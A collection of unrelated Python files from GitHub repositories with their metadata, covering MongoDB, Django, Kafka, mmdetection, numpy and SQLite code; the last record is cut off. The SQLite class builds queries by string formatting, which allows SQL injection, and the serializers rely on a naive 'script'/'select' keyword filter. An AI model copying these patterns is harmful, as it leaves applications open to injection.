kaitai-bot@kaitai.io
|
4f8cb442b126c2879d7a39a87916f78e9d53a6c7
|
c9169ae263bb28a231d8c6553cc44db12ab08317
|
/data_sequence2.py
|
649a06a22ea8a255b6e755525bbe9a9b3e9b8ad6
|
[] |
no_license
|
alyssum07/MongoDB
|
620ea9b3e47dad83d51a972f6aeee98883bd2ae2
|
f3db932172ad629c0d9fa39cbb386453e9a0c221
|
refs/heads/master
| 2022-09-29T14:43:30.056959
| 2020-05-31T14:54:16
| 2020-05-31T14:54:16
| 268,301,424
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,311
|
py
|
from pymongo import MongoClient
import pymongo
import datetime
date = datetime.date.today()
netq_collec = f'symphonyorder_netquantity_{date}'
# filtered_collec = f'neworders_{date}'
cumulative_collec = f"cumulative_{date}"
all_list_client_collec = f"client"
connection = MongoClient('localhost', 27017)
try:
cumulative_db = connection['Cumulative_symphonyorder']
all_list_db = connection['all_list']
# new_db = connection['symphonyorder_filtered']
except Exception:
print("ERROR: Mongo Connection Error123")
try:
netq_db = connection['symphonyorder_netquantity']
netq_db[netq_collec].drop()
print('Netq Collec Deleted')
except:
pass
client = all_list_db[all_list_client_collec].distinct("client")
client.remove("All")
def savedata(post):
try:
client = MongoClient()
db = client['symphonyorder_netquantity']
collec = f"symphonyorder_netquantity_{date}"
db.create_collection(collec)
print(f"Created New Collection '{collec}'")
db[collec].insert_one(post)
#print(post)
except Exception:
new_match=match = db[collec].find_one({ "$and" : [{"clientID":post['clientID']},{"symbol":post['symbol']}] })
if new_match:
# print(new_match)
if(new_match["quantity"]!=post["quantity"]):
db[collec].update({'_id': new_match['_id']}, {"$set": {"quantity":post["quantity"]}})
else:
db[collec].insert_one(post)
print("new Quantities Added")
def check_data():
while True:
for client_id in client:
new_client = cumulative_db[cumulative_collec].find_one({"clientID": client_id})
if new_client:
match=cumulative_db[cumulative_collec].aggregate([{"$match":{"clientID":client_id}},{"$group":{"_id":"$symbol","quantity":{"$sum":"$quantity"}}} ])
for i in match:
# print(client_id," ",i)
post={
"clientID":client_id,
"symbol":i["_id"],
"quantity":i["quantity"]
}
# print(post)
savedata(post)
check_data()
|
[
"noreply@github.com"
] |
alyssum07.noreply@github.com
|
a9756b61c8654e0de01fd685e38c66fe80899ec3
|
1298bca44f9304ba13c1f871c727b1517d05d515
|
/Audio_Playback.py
|
b31db5fc852c738d34103ae7df126198f1f8f4bb
|
[] |
no_license
|
Dpp3a/DJMM
|
af3f57a301d704704bc15519d1fff1a6772f2f79
|
b0c57f4926451fb7e4589bb3e97381a94dbca24e
|
refs/heads/master
| 2020-04-03T04:49:10.380890
| 2018-10-29T22:02:28
| 2018-10-29T22:02:28
| 155,024,917
| 0
| 0
| null | 2018-10-28T01:30:26
| 2018-10-28T01:30:26
| null |
UTF-8
|
Python
| false
| false
| 2,492
|
py
|
#!/usr/bin/env python3
import sys
import pysynth as ps
from pydub import AudioSegment
from pydub.playback import play
import re
#Script for taking the musical notes and playing them back as audio for project DJMM Prog4Bio 2018
#Using pysynth to make the wav file
#Note names have to be a to g
#sharps = #, flats = b
#format is (note, duration) with 4 as a quarter note, x is a whole note
#Make all lowercase
#Take the music notes generated from the song
#keynotes = sys.argv[1]
keynotes = ['B2', 'E4', 'G4', 'G#', 'D', 'G2', 'D#', 'G4', 'D3', 'G#2', 'C3', 'D2', 'F', 'B', 'D#3', 'G4', 'C3', 'E3', 'D#4', 'C#', 'C#', 'D3', 'C#', 'B2', 'B', 'C', 'G#', 'F2', 'C#3', 'E2', 'F#', ' ', 'G4', 'G#', 'F#3', 'C2', 'F#', 'F#4', 'E4', 'F#2', 'G', 'D4', 'C#3', 'F', 'F2', 'A#2', ' ', 'C#3', 'F#', 'E4', 'F2', 'B2', 'D#3', 'F#', 'G#2', 'C', 'G#2', 'E2', 'F#2', 'G2', 'B', ' ', 'D3', 'G2', 'F#', 'G4', 'D#3', 'G#2', 'B2', 'C3', 'D4', 'E3', 'F3', 'C#2', 'E4', 'E3', 'C#2', 'C4', 'C2', 'G#2', 'C2', 'E', ' 2', 'C', 'G#', 'C4', 'D#3', 'F2', 'D#4', 'C4', 'G#2', 'F', 'G#2', 'C', 'G#2', 'C4', 'D#4', 'C4', 'G#2', 'C#4', 'G#2', 'C', 'G#2', 'C4', 'D#4', 'C4', 'G#2', 'C#4', 'G#2', 'C', 'G#2', 'C4', 'D#4', 'C4', 'G#2', 'C#4', 'G#2', 'C', 'G#2', 'C4', 'D#4', 'C4', 'G#2', 'C#4', 'G#2', 'C', 'G#2', 'C4', 'D#4', 'C4', 'G#2', 'C#4', 'G#2', 'C', 'G#2', 'C4', 'D#4', 'C4', 'G#2']
#keynotes = ['G4', ' 2', 'C3', ' ', 'G2', 'C2', 'E', 'C#', 'C#4']
test = []
for note in keynotes:
note = note.lower()
if " 2" == note:
value = ['r',4]
test.append(value)
elif "2" in note:
note_letter = re.search(r"([A-Za-z]+#?)\d?", note)
value = [note_letter.group(1),4]
#print("Found a 2")
test.append(value)
#print(note)
#print(value)
#print(test)
#Stay positive
elif "4" in note:
note_letter = re.search(r"([A-Za-z]+#?)\d?", note)
value = [note_letter.group(1)+"5",4]
test.append(value)
#print(test)
elif "3" in note:
note_letter = re.search(r"([A-Za-z]+#?)\d?", note)
value = [note_letter.group(1)+"5",2]
test.append(value)
#print(test)
elif " " in note:
value = ['r',2]
test.append(value)
else:
note_letter = re.search(r"([A-Za-z]+#?)\d?", note)
value = [note_letter.group(1),2]
test.append(value)
#test = (('c', 4), ('e', 4), ('g', 4),
# ('c5', -2), ('e6', 8), ('d#6', 2))
ps.make_wav(test, fn = "test_real.wav", bpm = 360)
#Using Pydub to play the wav file generated
sound_file = "test_real.wav"
sound = AudioSegment.from_file(sound_file, format="wav")
play(sound)
|
[
"jfo@pfb06.cshl.edu"
] |
jfo@pfb06.cshl.edu
|
3502a01179712906c54bd114904bb556dc9e6add
|
e5985846ab9f0ad840f260ff5bd99bd006edfd92
|
/works/admin.py
|
647b4cb7e0355bd0a32de98db4597fb63e098a94
|
[] |
no_license
|
Achekeev/Klinika
|
ff60ffe14887a063622db0939cef2016b819d2d0
|
5893ef7e30d04c32f6ea40c8eea1c174c791ae80
|
refs/heads/main
| 2023-03-05T06:14:44.189490
| 2021-02-17T11:10:03
| 2021-02-17T11:10:03
| 330,867,766
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,289
|
py
|
from django.contrib import admin
from .models import Works, Blogs, Asks, Feedback, Online
@admin.register(Works)
class WorksAdmin(admin.ModelAdmin):
list_display = ['opera', 'beforeopera', 'afteropera', 'name']
list_filter = ['opera']
fields = ('opera', 'beforeopera', 'afteropera', 'name')
# readonly_fields = ['beforeopera', 'afteropera', 'name']
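    # Note: Django's ModelAdmin ignores an inner Meta class, so the verbose_name
    # settings below ('Работы' = "Works", 'Блог' = "Blog", 'Вопросы' = "Questions")
    # have no effect here; they belong on each model's Meta instead.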
class Meta:
verbose_name = 'Работы'
verbose_name_plural = 'Работы'
@admin.register(Blogs)
class BlogAdmin(admin.ModelAdmin):
list_display = ['name_blog']
fields = ('name_blog', 'photo', 'blog', 'url_blog')
class Meta:
verbose_name = 'Блог'
verbose_name_plural = 'Блог'
@admin.register(Asks)
class AsksAdmin(admin.ModelAdmin):
list_display = ['fio', 'phone', 'mail', 'date']
readonly_fields = ('fio', 'phone', 'mail', 'message', 'date')
class Meta:
verbose_name = 'Вопросы'
verbose_name_plural = 'Вопросы'
@admin.register(Feedback)
class FeedbackAdmin(admin.ModelAdmin):
list_display = ['name', ]
readonly_fields = ('name', 'photo', 'feedback')
@admin.register(Online)
class OnlineAdmin(admin.ModelAdmin):
list_display = ['fio', ]
readonly_fields = ('fio', 'phone', 'opera', 'message')
|
[
"bolotbekovtaalay@gmail.com"
] |
bolotbekovtaalay@gmail.com
|
7282770b17f53bca0b6cafbe04fa6ef625452666
|
79f78f91827953851090b55137fd04bed4596860
|
/mmdetection/configs/faster_rcnn_hr50_fpn_1x.py
|
1209f48e89eed8f8c185ad032b4194be4d4f24bf
|
[
"Apache-2.0",
"BSD-3-Clause"
] |
permissive
|
matej-ulicny/harmonic-networks
|
850c20b45844d77977ade676e98b73fc4e7da7f1
|
de2bbc636b0f1b928e3e043d4bd3090d100ff627
|
refs/heads/master
| 2022-05-04T15:18:43.334953
| 2022-04-22T12:16:05
| 2022-04-22T12:16:05
| 184,291,128
| 52
| 9
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,933
|
py
|
# model settings
model = dict(
type='FasterRCNN',
pretrained='https://github.com/matej-ulicny/harmonic-networks/releases/download/0.1.0/harm_resnet50-eec30392.pth',
backbone=dict(
type='HarmResNet',
depth=50,
num_stages=4,
out_indices=(0, 1, 2, 3),
frozen_stages=1,
style='pytorch'),
neck=dict(
type='FPN',
in_channels=[256, 512, 1024, 2048],
out_channels=256,
num_outs=5),
rpn_head=dict(
type='RPNHead',
in_channels=256,
feat_channels=256,
anchor_scales=[8],
anchor_ratios=[0.5, 1.0, 2.0],
anchor_strides=[4, 8, 16, 32, 64],
target_means=[.0, .0, .0, .0],
target_stds=[1.0, 1.0, 1.0, 1.0],
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=True, loss_weight=1.0),
loss_bbox=dict(type='SmoothL1Loss', beta=1.0 / 9.0, loss_weight=1.0)),
bbox_roi_extractor=dict(
type='SingleRoIExtractor',
roi_layer=dict(type='RoIAlign', out_size=7, sample_num=2),
out_channels=256,
featmap_strides=[4, 8, 16, 32]),
bbox_head=dict(
type='SharedFCBBoxHead',
num_fcs=2,
in_channels=256,
fc_out_channels=1024,
roi_feat_size=7,
num_classes=81,
target_means=[0., 0., 0., 0.],
target_stds=[0.1, 0.1, 0.2, 0.2],
reg_class_agnostic=False,
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),
loss_bbox=dict(type='SmoothL1Loss', beta=1.0, loss_weight=1.0)))
# model training and testing settings
train_cfg = dict(
rpn=dict(
assigner=dict(
type='MaxIoUAssigner',
pos_iou_thr=0.7,
neg_iou_thr=0.3,
min_pos_iou=0.3,
ignore_iof_thr=-1),
sampler=dict(
type='RandomSampler',
num=256,
pos_fraction=0.5,
neg_pos_ub=-1,
add_gt_as_proposals=False),
allowed_border=0,
pos_weight=-1,
debug=False),
rpn_proposal=dict(
nms_across_levels=False,
nms_pre=2000,
nms_post=2000,
max_num=2000,
nms_thr=0.7,
min_bbox_size=0),
rcnn=dict(
assigner=dict(
type='MaxIoUAssigner',
pos_iou_thr=0.5,
neg_iou_thr=0.5,
min_pos_iou=0.5,
ignore_iof_thr=-1),
sampler=dict(
type='RandomSampler',
num=512,
pos_fraction=0.25,
neg_pos_ub=-1,
add_gt_as_proposals=True),
pos_weight=-1,
debug=False))
test_cfg = dict(
rpn=dict(
nms_across_levels=False,
nms_pre=1000,
nms_post=1000,
max_num=1000,
nms_thr=0.7,
min_bbox_size=0),
rcnn=dict(
score_thr=0.05, nms=dict(type='nms', iou_thr=0.5), max_per_img=100)
# soft-nms is also supported for rcnn testing
# e.g., nms=dict(type='soft_nms', iou_thr=0.5, min_score=0.05)
)
# dataset settings
dataset_type = 'CocoDataset'
data_root = 'data/coco/'
img_norm_cfg = dict(
mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
data = dict(
imgs_per_gpu=5,
workers_per_gpu=2,
train=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_train2017.json',
img_prefix=data_root + 'train2017/',
img_scale=(1333, 800),
img_norm_cfg=img_norm_cfg,
size_divisor=32,
flip_ratio=0.5,
with_mask=False,
with_crowd=True,
with_label=True),
val=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_val2017.json',
img_prefix=data_root + 'val2017/',
img_scale=(1333, 800),
img_norm_cfg=img_norm_cfg,
size_divisor=32,
flip_ratio=0,
with_mask=False,
with_crowd=True,
with_label=True),
test=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_val2017.json',
img_prefix=data_root + 'val2017/',
img_scale=(1333, 800),
img_norm_cfg=img_norm_cfg,
size_divisor=32,
flip_ratio=0,
with_mask=False,
with_label=False,
test_mode=True))
# optimizer
optimizer = dict(type='SGD', lr=0.0125, momentum=0.9, weight_decay=0.0001)
optimizer_config = dict(grad_clip=dict(max_norm=35, norm_type=2))
# learning policy
lr_config = dict(
policy='step',
warmup='linear',
warmup_iters=500,
warmup_ratio=1.0 / 3,
step=[8, 11])
checkpoint_config = dict(interval=1)
log_config = dict(
interval=50,
hooks=[
dict(type='TextLoggerHook'),
])
# runtime settings
total_epochs = 12
dist_params = dict(backend='nccl')
log_level = 'INFO'
work_dir = './work_dirs/faster_rcnn_hr50_fpn_1x'
load_from = None
resume_from = None
workflow = [('train', 1)]
|
[
"mtj.ulicny@gmail.com"
] |
mtj.ulicny@gmail.com
|
11fca4c271e671c42c6ee613efc83330024896c5
|
9ac2a765ae71dfe2abb18de74bc6e6e58e82f79e
|
/payment/serializers.py
|
828ea3107df65edb0a220922606289859e31a61a
|
[
"LicenseRef-scancode-warranty-disclaimer",
"Apache-2.0"
] |
permissive
|
skyydq/GreaterWMS
|
aaa23bfa6894170692648d18110f6684e1dfe9b3
|
e14014a73b36ec0f0df03712a229b0931cb388fb
|
refs/heads/master
| 2023-05-26T00:46:52.541912
| 2021-06-10T09:07:40
| 2021-06-10T09:07:40
| 358,170,149
| 0
| 0
|
Apache-2.0
| 2021-04-15T07:39:02
| 2021-04-15T07:39:02
| null |
UTF-8
|
Python
| false
| false
| 4,317
|
py
|
from rest_framework import serializers
from .models import TransportationFeeListModel
from userprofile.models import Users
import re
from rest_framework.exceptions import APIException
def data_validate(data):
script_obj = re.findall(r'script', str(data), re.IGNORECASE)
select_obj = re.findall(r'select', str(data), re.IGNORECASE)
if script_obj:
        raise APIException({'detail': 'Bad data cannot be stored'})
elif select_obj:
        raise APIException({'detail': 'Bad data cannot be stored'})
else:
return data
def openid_validate(data):
if Users.objects.filter(openid=data).exists():
return data
else:
raise APIException({'detail': 'User does not exists'})
def appid_validate(data):
if Users.objects.filter(appid=data).exists():
return data
else:
raise APIException({'detail': 'User does not exists'})
class PaymentGetSerializer(serializers.ModelSerializer):
send_city = serializers.CharField(read_only=True, required=False)
receiver_city = serializers.CharField(read_only=True, required=False)
weight_fee = serializers.FloatField(read_only=True, required=False)
volume_fee = serializers.FloatField(read_only=True, required=False)
transportation_supplier = serializers.CharField(read_only=True, required=False)
creater = serializers.CharField(read_only=True, required=False)
create_time = serializers.DateTimeField(read_only=True, format='%Y-%m-%d %H:%M:%S')
update_time = serializers.DateTimeField(read_only=True, format='%Y-%m-%d %H:%M:%S')
class Meta:
model = TransportationFeeListModel
exclude = ['openid', 'is_delete', ]
read_only_fields = ['id']
class PaymentPostSerializer(serializers.ModelSerializer):
openid = serializers.CharField(read_only=False, required=False, validators=[openid_validate])
send_city = serializers.CharField(read_only=False, required=True, validators=[data_validate])
receiver_city = serializers.CharField(read_only=False, required=True, validators=[data_validate])
weight_fee = serializers.FloatField(read_only=False, required=True, validators=[data_validate])
volume_fee = serializers.FloatField(read_only=False, required=True, validators=[data_validate])
transportation_supplier = serializers.CharField(read_only=False, required=True, validators=[data_validate])
creater = serializers.CharField(read_only=False, required=True, validators=[data_validate])
class Meta:
model = TransportationFeeListModel
exclude = ['is_delete', ]
read_only_fields = ['id', 'create_time', 'update_time', ]
class PaymentUpdateSerializer(serializers.ModelSerializer):
send_city = serializers.CharField(read_only=False, required=True, validators=[data_validate])
receiver_city = serializers.CharField(read_only=False, required=True, validators=[data_validate])
weight_fee = serializers.FloatField(read_only=False, required=True, validators=[data_validate])
volume_fee = serializers.FloatField(read_only=False, required=True, validators=[data_validate])
transportation_supplier = serializers.CharField(read_only=False, required=True, validators=[data_validate])
creater = serializers.CharField(read_only=False, required=True, validators=[data_validate])
class Meta:
model = TransportationFeeListModel
exclude = ['openid', 'is_delete', ]
read_only_fields = ['id', 'create_time', 'update_time', ]
class PaymentPartialUpdateSerializer(serializers.ModelSerializer):
send_city = serializers.CharField(read_only=False, required=False, validators=[data_validate])
receiver_city = serializers.CharField(read_only=False, required=False, validators=[data_validate])
weight_fee = serializers.FloatField(read_only=False, required=False, validators=[data_validate])
volume_fee = serializers.FloatField(read_only=False, required=False, validators=[data_validate])
transportation_supplier = serializers.CharField(read_only=False, required=False, validators=[data_validate])
creater = serializers.CharField(read_only=False, required=False, validators=[data_validate])
class Meta:
model = TransportationFeeListModel
exclude = ['openid', 'is_delete', ]
read_only_fields = ['id', 'create_time', 'update_time', ]
|
[
"4766704@qq.com"
] |
4766704@qq.com
|
13a680e7eea292e02a84ad747852bcc285b37918
|
5c5ce13ece5f8a0327fa752d5b1eb9057aae51d7
|
/ClassMate/classMateDB.py
|
3a5cddc551c230e6afc1c3c358479b4cc34d4c2f
|
[
"MIT"
] |
permissive
|
GFBryson/myProjects
|
1f4c428c9fc68f670c7375a9b40593e9dbb8c892
|
e7bb5ba825867eb39e95c7870a5d31a7615ccdb9
|
refs/heads/master
| 2018-10-10T02:49:59.467386
| 2018-10-09T02:03:59
| 2018-10-09T02:03:59
| 110,400,819
| 1
| 1
|
MIT
| 2018-06-23T02:47:32
| 2017-11-12T03:15:30
|
Python
|
UTF-8
|
Python
| false
| false
| 2,438
|
py
|
import datetime
import sqlite3
class sdb:
connection=None
cursor=None
    def __init__(self):  # create or connect to the database file and build its tables
self.connection = sqlite3.connect("classMate.db")
self.cursor = self.connection.cursor()
self.create_db()
def create_db(self):
print("in table maker")
sql_commands= [e for e in (open('build_db.txt','r').read()).split('--split--') if ('--' not in e)]
print("file read")
for c in sql_commands:
try:
self.cursor.execute(c)
except Exception as e:
raise e
print("executed")
self.connection.commit()
print("committed")
def add_channel(self,ch):
if self.cursor.execute('select * from channels where ch_id = "{channel}";'.format(channel=ch)).fetchall() == []:
self.cursor.execute('insert into channels(ch_id) values("{channel}");'.format(channel=ch))
def add_event(self,info):
self.cursor.execute('select ch_id from channels where ch_id ="{ch}";'.format(ch=info['channel']))
a=self.cursor.fetchall()
if a==[]:
return -1
sql_command = """INSERT INTO events (ev_id,date_time,ch_id,title,description,loc)
VALUES(NULL,"{date_time}","{channel}","{title}","{des}","{loc}");""".format(date_time=info['date'],channel=info['channel'],title=info['title'],des=info['desc'],loc=info['loc'])
self.cursor.execute(sql_command)
self.connection.commit()
return 1
def add_assignment(self,info):
self.cursor.execute('select ch_id from channels where ch_id ="{ch}";'.format(ch=info['channel']))
a=self.cursor.fetchall()
if a==[]:
return -1
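        # NB: the 'asssignments' spelling (triple 's') below must match the table created by build_db.txt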
sql_command = """INSERT INTO asssignments (a_id,date_time,ch_id,title,description,loc)
VALUES(NULL,"{date_time}","{channel}","{title}","{des}","{loc}");""".format(date_time=info['date'],channel=info['channel'],title=info['title'],des=info['desc'],loc=info['loc'])
self.cursor.execute(sql_command)
self.connection.commit()
return 1
def print_table(self,table):
self.cursor.execute("SELECT * FROM {tbl}".format(tbl=table))
result=self.cursor.fetchall()
for r in result:
print(r)
def get_events(self,order_by=None):
if order_by==None:
return self.cursor.execute("select * from events;").fetchall()
return self.cursor.execute("SELECT * FROM events ORDER BY '{order}'".format(order=order_by)).fetchall()
def select_event(self,ch):
return self.cursor.execute("select * from events where ch_id = '{channel}';".format(channel=ch)).fetchall()
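# Hypothetical usage sketch (not in the original source):
# db = sdb()  # connects to classMate.db and runs the schema in build_db.txt
# db.add_channel("general")
# db.print_table("channels")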
|
[
"gillianfbryson@gmail.com"
] |
gillianfbryson@gmail.com
|
443ff33e4c6eefa91b9acadff67dba1d7c677efb
|
15d2e5a02013aa65b4048795c50235adf9b089df
|
/kafka_utils/kafka_check/commands/under_replicated.py
|
329327d381275b4293903d403777017a750d015d
|
[
"Apache-2.0"
] |
permissive
|
agentbond007/kafka-utils
|
89ab7822826a8135fdff78ea3cd8fe5c49437f17
|
64e8a11c42dbff969f7a8ca89fe7cfa208ed8ddf
|
refs/heads/master
| 2021-01-19T17:03:06.202505
| 2016-09-27T01:28:20
| 2016-09-27T01:28:20
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,392
|
py
|
# -*- coding: utf-8 -*-
# Copyright 2016 Yelp Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from kafka_utils.kafka_check import status_code
from kafka_utils.kafka_check.commands.command import get_broker_id
from kafka_utils.kafka_check.commands.command import KafkaCheckCmd
from kafka_utils.util.metadata import get_topic_partition_metadata
# This check looks for entries carrying this error code in the error
# field of the Kafka metadata response.
REPLICA_NOT_AVAILABLE_ERROR = 9
class UnderReplicatedCmd(KafkaCheckCmd):
def build_subparser(self, subparsers):
subparser = subparsers.add_parser(
'under_replicated',
            description='Check under replicated partitions for all '
                        'brokers in the cluster.',
            help='This command sums all under replicated partitions '
                 'for each broker, if any. It queries the jolokia port '
                 'to retrieve this data.',
)
subparser.add_argument(
'--first-broker-only',
action='store_true',
            help='If this parameter is specified, the check does nothing and '
                 'succeeds on every broker except the first one in the Kafka '
                 'cluster. Set --broker-id to -1 to read the broker id from '
                 '--data-path. Default: %(default)s',
)
return subparser
def run_command(self):
"""Under_replicated command, checks number of under replicated partitions for
all brokers in the Kafka cluster."""
broker_list = self.zk.get_brokers()
if self.args.first_broker_only:
if self.args.broker_id is None:
return status_code.WARNING, 'Broker id is not specified'
if not _check_run_on_first_broker(broker_list, self.args.broker_id, self.args.data_path):
return status_code.OK, 'Provided broker is not the first in broker-list.'
under_replicated = _get_under_replicated(
self.cluster_config.broker_list
)
if not under_replicated:
return status_code.OK, 'No under replicated partitions.'
else:
if self.args.verbose:
for (topic, partition) in under_replicated:
print('{topic}:{partition}'.format(
topic=topic,
partition=partition,
))
msg = "{under_replicated} under replicated partitions.".format(
under_replicated=len(under_replicated),
)
return status_code.CRITICAL, msg
def _check_run_on_first_broker(broker_list, broker_id, data_path):
"""Returns true if the first broker in broker_list the same as in args."""
broker_id = broker_id if broker_id != -1 else get_broker_id(data_path)
first_broker_id, _ = min(broker_list.items())
return broker_id == first_broker_id
def _process_topic_partition_metadata(topic_partitions_metadata):
"""Return set with under replicated partitions."""
under_replicated = set()
for partitions in topic_partitions_metadata.values():
for metadata in partitions.values():
if int(metadata.error) == REPLICA_NOT_AVAILABLE_ERROR:
under_replicated.add((metadata.topic, metadata.partition))
return under_replicated
def _get_under_replicated(broker_list):
"""Requests kafka-broker for metadata info for topics.
Then checks if topic-partition is under replicated and there are not enough
replicas in sync. Returns set of under replicated partitions.
:param dictionary broker_list: dictionary with brokers information, broker_id is key
:returns set: with under replicated partitions
* set: { (topic, partition), ... }
"""
metadata = get_topic_partition_metadata(broker_list)
return _process_topic_partition_metadata(metadata)
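# Registered as the 'under_replicated' subcommand of the kafka-check CLI via
# build_subparser() above.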
|
[
"alp@yelp.com"
] |
alp@yelp.com
|
fe8a9e471439cab989137c9047a9c494edb0f015
|
bf61570b714408206ee89b68c55d9e8041a3328c
|
/app/models/collection.py
|
11a502096824a78c7a0f5dceff707bd83fac29dd
|
[] |
no_license
|
Mox93/rizzmi
|
d77c5588eb3434bbfb98850d40da69a2661cc8a2
|
f0b1e8194e77abda8a8d54d26d83bd9359f13d0d
|
refs/heads/test_deploy
| 2023-05-11T07:34:26.896546
| 2019-11-28T15:38:39
| 2019-11-28T15:38:39
| 210,208,394
| 0
| 0
| null | 2023-05-02T18:32:27
| 2019-09-22T20:16:19
|
Python
|
UTF-8
|
Python
| false
| false
| 1,588
|
py
|
from common.db import db, ExtendedDocument, ExtendedEmbeddedDocument
class Connection(ExtendedEmbeddedDocument):
"""
A holder for information about the database collection
Its main fields are:
- name: the displayed name in the webapp
- dynamic_document: whether the collection should accept dynamic document or not
** the collection name in the database is the Connection's _id
"""
name = db.StringField(required=True, max_length=50, default="Untitled Collection")
dynamic_document = db.BooleanField(required=True, default=True)
class CollectionTemplateModel(ExtendedDocument):
"""
A template containing the fields of documents that are saved in the correlating collection.
Its main fields are:
- name: the name that will show in the collection list
- title: the title that will show in the top of the collection
- description: text that is displayed under the title
- fields: a list of all the fields in the order they show in the collection table
- db_connection: information about the actual database collection ## if exists
"""
meta = {'collection': 'collection_templates'}
name = db.StringField(required=True, max_length=50, default="Untitled Collection")
title = db.StringField(required=True, max_length=500, default="Untitled Collection")
description = db.StringField()
fields = db.EmbeddedDocumentListField(ExtendedEmbeddedDocument)
db_connection = db.EmbeddedDocumentField(Connection)
|
[
"mohamed.ragaiy.saleh@gmail.com"
] |
mohamed.ragaiy.saleh@gmail.com
|
896dfb44a55d9dbe50554c7400554f7e7df1b335
|
7aad8a550d134729a311dc8f733266dbee903ebc
|
/11_Lines_NN.py
|
ab9bb58c04c67f02874cbae65ee4aea82e213b53
|
[] |
no_license
|
PScipi0/11_Lines_NN
|
723d0ad1635f5948f4270932be07020efaaf5bc5
|
13ea56c7a4f3c07c193f9fa5a0185e9d4500e415
|
refs/heads/master
| 2021-04-04T22:33:43.337505
| 2020-03-19T15:02:00
| 2020-03-19T15:02:00
| 248,495,954
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,974
|
py
|
import numpy as np
# sigmoid function
def sigmoid(x, deriv = False):
if(deriv == True):
return x*(1 - x)
return 1 / (1 + np.exp(-x))
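# Note: when deriv=True the argument is assumed to already be a sigmoid
# output s, so the derivative is computed as s * (1 - s).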
# input data
X = np.array([ [0, 0, 1],
[0, 1, 1],
[1, 0, 1],
[1, 1, 1] ])
# output data
y = np.array([[0, 0, 1, 1]]).T
# Seed for deterministic behaviour
np.random.seed(1)
# initialize weights randomly with mean 0
syn0 = 2*np.random.random((3,1)) - 1
print(syn0)
for iter in range(10000):
# forward propagation
l0 = X
l1 = sigmoid(np.dot(l0, syn0))
# calculate naive error
l1_error = y - l1
# print error to visualize training progress
if(iter % 1000 == 0):
print(l1_error)
# Naive learning approach
l1_delta = l1_error * sigmoid(l1, True)
# update weights
syn0 += np.dot(l0.T, l1_delta)
result1 = l1
y = np.array([[0, 1, 1, 0]]).T
# randomly initialize our weights with mean 0
syn0 = 2*np.random.random((3,4)) - 1
syn1 = 2*np.random.random((4,1)) - 1
for j in range(60000):
# Feed forward through layers 0, 1, and 2
l0 = X
l1 = sigmoid(np.dot(l0, syn0))
l2 = sigmoid(np.dot(l1, syn1))
# how much did we miss the target value?
l2_error = y - l2
if (j% 10000) == 0:
print("Error:" + str(np.mean(np.abs(l2_error))))
# in what direction is the target value?
# were we really sure? if so, don't change too much.
l2_delta = l2_error*sigmoid(l2,deriv=True)
# how much did each l1 value contribute to the l2 error (according to the weights)?
l1_error = l2_delta.dot(syn1.T)
# in what direction is the target value?
# were we really sure? if so, don't change too much.
l1_delta = l1_error * sigmoid(l1, deriv = True)
    # update weights
syn1 += l1.T.dot(l2_delta)
syn0 += l0.T.dot(l1_delta)
print("Output of first network after Training")
print(result1)
print("Output of second network after Training")
print(l2)
|
[
"mcgiver2@freenet.de"
] |
mcgiver2@freenet.de
|
5841e045b491f7081df66ceeb5c9175ca8d51e51
|
bea1cc36fd6ec0b37a4cda52163689ca7f3910b9
|
/파이썬문법/수 자료형의 연산.py
|
e60370edf63e62baf4a30d20f2cca67da5de291b
|
[] |
no_license
|
yeongwoojang/CordingTest-with-Python
|
13cbfd8945ce7259ab2c00701e1b3ef72d7656c4
|
2430ad506d7373a462f3783d9877e292965d30ec
|
refs/heads/main
| 2023-02-18T18:54:04.236701
| 2021-01-18T12:35:53
| 2021-01-18T12:35:53
| 330,416,427
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 145
|
py
|
# Operations on numeric types
a=7
b=3
# division
print(a/b)
# remainder (modulo)
print(a%b)
# quotient (floor division)
print(a//b)
# exponentiation
print(a**b) # a^b -> 7 to the power of 3
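# Expected output: 2.3333333333333335, 1, 2, 343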
|
[
"noreply@github.com"
] |
yeongwoojang.noreply@github.com
|
27d5f039d1aac10122c7c5092b85fb85d45a9bd9
|
cb54551c71a91318822a15ba57a3a4b0d661ece6
|
/lesson4/hometask3.py
|
d9904d5fdca41ea8cedccdeed6eeab335e13d5fa
|
[] |
no_license
|
ElenaDolganova/Python-lesson-1
|
2384bf9ae5479e719f49684829fbd2ddce9eb3dc
|
c529ec9393f5aeee4dd2cd15d707df7a3c57c702
|
refs/heads/main
| 2023-05-13T17:51:07.981495
| 2021-06-03T15:43:51
| 2021-06-03T15:43:51
| 358,188,602
| 0
| 0
| null | 2021-06-03T15:43:51
| 2021-04-15T08:42:34
|
Python
|
UTF-8
|
Python
| false
| false
| 341
|
py
|
# For numbers from 20 to 240, find those divisible by 20 or 21. Solve it in a single line.
# Hint: use the range() function and a comprehension.
new_list = [i for i in range(20, 241) if i % 20 == 0 or i % 21 == 0]
print(new_list)
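# Expected output:
# [20, 21, 40, 42, 60, 63, 80, 84, 100, 105, 120, 126, 140, 147, 160, 168, 180, 189, 200, 210, 220, 231, 240]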
|
[
"elcorplus@mail.ru"
] |
elcorplus@mail.ru
|
9f50241da8d05157520332ef1b2a8ef56cdff637
|
110f823639b9cdfb70428e33e15c05ff08287db8
|
/sla_dag.py
|
c6c718b9fb6da70cb40e9489718d495228fc8cce
|
[] |
no_license
|
harish678/airflow
|
27cb00f66151e19557cdb99bfc69e2132fb8698d
|
5aa325251a01deb1aaa6d5e93a6f9f48b35cf2dc
|
